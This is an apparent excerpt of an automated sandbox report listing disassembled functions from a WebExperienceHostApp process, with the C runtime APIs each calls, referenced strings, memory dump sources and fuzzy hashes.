Opcode Fuzzy Hash: af74e7a852e4c75f6a718f3a8d1f3b3ec46cce7310ff1cc0720302810e8eb93a
Instruction Fuzzy Hash: D0516F66D0915381EB25BB61D5102B976F6EF20FA4F8C8033DB89466ACEF6DE841C750

Function 00007FFE007DA764 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA78A
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA79B
isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA7F4
isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE007D9BB2), ref: 00007FFE007DA8A4

Strings

(, xrefs: 00007FFE007DA898

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: isspace$isalnumisxdigit
String ID: (
API String ID: 3355161242-3887548279
Opcode ID: e4c8b5f9a1eedea8ab66487062a0c964c7a231e5b0b0ae06890dc159a5d96cfd
Instruction ID: ece36580488891b7ea6a500311bd5869ae2dc2fd29cf272eb5f1e32d78db340f
Opcode Fuzzy Hash: e4c8b5f9a1eedea8ab66487062a0c964c7a231e5b0b0ae06890dc159a5d96cfd
Instruction Fuzzy Hash: E541A757D0D68225FB125F30A5503F96BB2AF21B84F1C9032CFD9077AADE1DE80A9712

Function 00007FFE1A455560 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE1A455629

Strings

csm, xrefs: 00007FFE1A4555C4
RCC, xrefs: 00007FFE1A4555AE
csm, xrefs: 00007FFE1A455710
MOC, xrefs: 00007FFE1A4555A2

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: FileHeader
String ID: MOC$RCC$csm$csm
API String ID: 104395404-1441736206
Opcode ID: e47b9c62b142ec837dc56d6eeb4aaf33c41ea22ad6153d04f5b8a65e6047be76
Instruction ID: ba3e85fc867b91c2fa69d9631323e2940d0d24e281e5d4af1a67739672f428fa
Opcode Fuzzy Hash: e47b9c62b142ec837dc56d6eeb4aaf33c41ea22ad6153d04f5b8a65e6047be76
Instruction Fuzzy Hash: 8C516FB2B09A4186EA60BB36904137D66A0FF44FA4F5540F7DE4D837B9CF3CE4618682

Function 00007FFE007A9B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFE007A9C07
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007A9C4A
memcpy.VCRUNTIME140_APP ref: 00007FFE007A9C54
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE007A9C87

Strings

`Sz, xrefs: 00007FFE007A9CA0

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: `Sz
API String ID: 1775671525-2530247815
Opcode ID: 7371046f5cd766d1bffe046c2d59978eee7b4bc23b1b826026726add19b89a48
Instruction ID: 150ba43a6c4dad5514b5233f108223d494012e20982b68ff2cd65bd2a54c18fd
Opcode Fuzzy Hash: 7371046f5cd766d1bffe046c2d59978eee7b4bc23b1b826026726add19b89a48
Instruction Fuzzy Hash: 8931056170AA4185EA04EB12A544279A395EF85BF0F588630EF2D07BF9DF7CE0A1C300

Function 00007FFE007C44F8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFE007BAA1C), ref: 00007FFE007C4539

Part of subcall function 00007FFE007AB610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007D1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007AB63B
Part of subcall function 00007FFE007AB610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE007D1D6E,?,?,?,?,?,?,?,?,00000000,00007FFE007D2EAE), ref: 00007FFE007AB657

_Getvals.LIBCPMT ref: 00007FFE007C4575

Strings

$+xv, xrefs: 00007FFE007C461E
$+xv, xrefs: 00007FFE007C45A7
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FFE007C45AE

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Getvals___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 3848194746-3573081731
Opcode ID: 2a1dead84669e62d4c6aa20b34b7046138b1e70ef67a0d10036ed14bfbe73e3f
Instruction ID: 7faa551c9392d9db2ca055c0a58c951d27a94d279c72c929e9353f2b4464f1af
Opcode Fuzzy Hash: 2a1dead84669e62d4c6aa20b34b7046138b1e70ef67a0d10036ed14bfbe73e3f
Instruction Fuzzy Hash: AA41BE72A09B8197E764DF25E19086D7BA0FB45781B084239DB8A53F29DF3CE572CB00

Function 00007FFE007C47CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFE007C47FA

Part of subcall function 00007FFE007DBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
Part of subcall function 00007FFE007DBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
Part of subcall function 00007FFE007DBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
Part of subcall function 00007FFE007DBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

_Maklocstr.LIBCPMT ref: 00007FFE007C4873
_Maklocstr.LIBCPMT ref: 00007FFE007C4889

Strings

true, xrefs: 00007FFE007C4882
false, xrefs: 00007FFE007C486C

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstr$___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
String ID: false$true
API String ID: 309754672-2658103896
Opcode ID: b86e9ff55447f8bb7dd7b80b7493685c570f732746a915be5b888df3f4acdba4
Instruction ID: 9cdcc84b4929002a717da5f72e2c56b39546d201c13022e95e0fc4fa56ad8592
Opcode Fuzzy Hash: b86e9ff55447f8bb7dd7b80b7493685c570f732746a915be5b888df3f4acdba4
Instruction Fuzzy Hash: 06419A22B19B5599E710DFB0E4401ED33B0FB88788B445126EF4E27B69DF38D595C394

Function 00007FFE007A8CB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFE007A8D07
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFE007A8D18

Strings

ios_base::failbit set, xrefs: 00007FFE007A8CDB
ios_base::eofbit set, xrefs: 00007FFE007A8CE2
ios_base::badbit set, xrefs: 00007FFE007A8CCF

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: a2b70420098d26693de4527d37465282da3bca17158f06936729b8f78c388bff
Instruction ID: 496138003b9da2988bfa187e1e77684b10216ceff66eff983ef948b1f26e5c26
Opcode Fuzzy Hash: a2b70420098d26693de4527d37465282da3bca17158f06936729b8f78c388bff
Instruction Fuzzy Hash: 51F0ADA2A1B50696EA98EB04D8816F92321FB81708FAC4435E30D067BDDF3CE646C761

Function 00007FFE007B5220 Relevance: 7.7, APIs: 5, Instructions: 177COMMON

Download Yara Rule

APIs

fgetwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B52D4

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: fgetwc
String ID:
API String ID: 2948136663-0
Opcode ID: 5d0bd3b3671dd2de51b020413378f813fd9af0de5620b63b9d479feaafa28656
Instruction ID: 567bd37ee9ef7ee87cf94393ba01c0e923c3eeddc003e1913f8fea86661e6f64
Opcode Fuzzy Hash: 5d0bd3b3671dd2de51b020413378f813fd9af0de5620b63b9d479feaafa28656
Instruction Fuzzy Hash: 8C812972A06E8189EB609F25C0943AC33A1FB58B98F595132EB4D87BADDF7DD594C300

Function 00007FFE007AB784 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB84B
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB859
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB892
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB89C
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFE007D1D6E), ref: 00007FFE007AB8AA

Part of subcall function 00007FFE007F2B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5AA8), ref: 00007FFE007F2B36

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpymemset$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 3375828981-0
Opcode ID: 6f4a34c3589a7d23e4e271cc679256edd1debc67f1c1ab71833d9f73d2c9430a
Instruction ID: 55b0b525de0a37a8a2521697bcd8a1c8fa29728b3f0e03172d69981dddb8c3f8
Opcode Fuzzy Hash: 6f4a34c3589a7d23e4e271cc679256edd1debc67f1c1ab71833d9f73d2c9430a
Instruction Fuzzy Hash: 3131C361B0A68295EE04AB56A9043B96355FB85BD0F5C4531EF5D0BBAFCF7CE1828340

Function 00007FFE1A459CC4 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1A459D3D
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A459D5F
DName::DName.LIBVCRUNTIME ref: 00007FFE1A459D72
DName::DName.LIBVCRUNTIME ref: 00007FFE1A459DA9
DName::DName.LIBVCRUNTIME ref: 00007FFE1A459DB4

Memory Dump Source

Source File: 00000008.00000002.2073941607.00007FFE1A451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A450000, based on PE: true

Associated: 00000008.00000002.2073926171.00007FFE1A450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074005137.00007FFE1A461000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074022650.00007FFE1A466000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.2074040802.00007FFE1A467000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe1a450000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 58c7f08e817265fdc996fa836f6f1a6d952153b3f959fa2b3b32e8b1553b858e
Instruction ID: 67626b73ad26fc069d3e6ce5036293b0937cd8f3760fb571717ab0e7c6a6dbb5
Opcode Fuzzy Hash: 58c7f08e817265fdc996fa836f6f1a6d952153b3f959fa2b3b32e8b1553b858e
Instruction Fuzzy Hash: DB418376B08E5694EB10DB22D8501F87BB4BB05FA0B9444F3DA5D533A6DF38E469C700

Function 00007FF619495C80 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00004FD9DBC08E58,00007FF619495077,?,?,00000000,00007FF6194932B7,?,?,?,00007FF619493297,?,?,00000000,00007FF619495D42), ref: 00007FF619495CA2
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00004FD9DBC08E58,00007FF619495077,?,?,00000000,00007FF6194932B7,?,?,?,00007FF619493297,?,?,00000000,00007FF619495D42), ref: 00007FF619495CAE
memset.VCRUNTIME140_APP(?,?,00004FD9DBC08E58,00007FF619495077,?,?,00000000,00007FF6194932B7,?,?,?,00007FF619493297,?,?,00000000,00007FF619495D42), ref: 00007FF619495CE7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00004FD9DBC08E58,00007FF619495077,?,?,00000000,00007FF6194932B7,?,?,?,00007FF619493297,?,?,00000000,00007FF619495D42), ref: 00007FF619495CF6
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00004FD9DBC08E58,00007FF619495077,?,?,00000000,00007FF6194932B7,?,?,?,00007FF619493297,?,?,00000000,00007FF619495D42), ref: 00007FF619495D02

Memory Dump Source

Source File: 00000008.00000002.2073734215.00007FF619491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF619490000, based on PE: true

Associated: 00000008.00000002.2073718084.00007FF619490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073752558.00007FF61949A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073773372.00007FF61949E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2073792932.00007FF61949F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff619490000_WebExperienceHostApp.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$memset
String ID:
API String ID: 577239450-0
Opcode ID: 9367a4d55e890f3ae2d68fb533305932e09a24cd37a727d6c0f3e9578350c234
Instruction ID: 2d5c99e49dcf46dd4bc52dd8a6bd7d57ef03fa79075c5bfc0d64557d4715a671
Opcode Fuzzy Hash: 9367a4d55e890f3ae2d68fb533305932e09a24cd37a727d6c0f3e9578350c234
Instruction Fuzzy Hash: 79018F20E0DE5286FB105F91A7182796250BF5CFF8F284430DE09C7B89CE2DA861C341

Function 00007FFE007A4BF0 Relevance: 7.5, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007B2170: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FFE007A4BFE,?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007B217F

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007A4C07
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007A4C1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007A4C2F
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007A4C43
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007A4C57
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE007A5B0B), ref: 00007FFE007A4C6B

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free$setlocale
String ID:
API String ID: 294139027-0
Opcode ID: ec2947436e03ee684cb70bb826a4a9021d29c8d7d003c080e4c03139d84977b6
Instruction ID: 39ffe138e0905b3b03ed1d2b2874f9d9e1187cce0e60f9d6d0ae69f0abff0d18
Opcode Fuzzy Hash: ec2947436e03ee684cb70bb826a4a9021d29c8d7d003c080e4c03139d84977b6
Instruction Fuzzy Hash: 3411C922A07A0981EB59AF65D0A53396360EF85F98F1C0534CB0E0A36CCFBDE894D390

Function 00007FFE007B94C0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B94DD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B94E7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B94F1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B94FB

Strings

@Rz, xrefs: 00007FFE007B9501

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: 78515aec29c92e18f2c63f3efd2ffdad150a398ddd245488889049c7a56c38d1
Instruction ID: de8329842c2746a011b00a9195ebad0cb114904dfea458b4cffb1745c3ac60de
Opcode Fuzzy Hash: 78515aec29c92e18f2c63f3efd2ffdad150a398ddd245488889049c7a56c38d1
Instruction Fuzzy Hash: ADF0EC2161AF0692DB44AB19E9941786370FF88BD4B584031DB4D53B78DF6CE4A58700

Function 00007FFE007B9450 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B946D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9477
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9481
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B948B

Strings

@Rz, xrefs: 00007FFE007B9491

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: 1408db0c91c4afda7cd62dbc657a8b28289742c7a241f7735ef7cac3faab0118
Instruction ID: d046f3ff4b2fa989e760471acc7bca4ca0af8f92f8f89f73f0c46380737de857
Opcode Fuzzy Hash: 1408db0c91c4afda7cd62dbc657a8b28289742c7a241f7735ef7cac3faab0118
Instruction Fuzzy Hash: D2F0E726A1AF4692EB44AB1AE9941786334FF88BD4F584031DB4D53B78DFACE4A58300

Function 00007FFE007B33F0 Relevance: 7.5, APIs: 5, Instructions: 17COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B33FE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B340A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B3415
fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007B3423
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007B3429

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: __acrt_iob_func$abortfputcfputs
String ID:
API String ID: 2697642930-0
Opcode ID: aee1c2c9c76fa389c21114d33f76dd71eb7fbf57215ad3c44bcd325c68c615ae
Instruction ID: 95bc4e3a33b741f4e1f64c72b170bc2ad3a13a2228f34f6eb6be7f2e108a3495
Opcode Fuzzy Hash: aee1c2c9c76fa389c21114d33f76dd71eb7fbf57215ad3c44bcd325c68c615ae
Instruction Fuzzy Hash: B0E0ECA4A1AE4283EB087B61EC1C3346627AF4CB92F281038CB1F5B379DE2C54684221

Function 00007FFE007D7D40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007D7DB4
_Strftime.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE007D7DF3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007D7ED9

Part of subcall function 00007FFE007B0120: memset.VCRUNTIME140_APP ref: 00007FFE007B0168

Strings

!%x, xrefs: 00007FFE007D7D72

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: Strftime_errno_invalid_parameter_noinfo_noreturnmemset
String ID: !%x
API String ID: 3810971073-1893981228
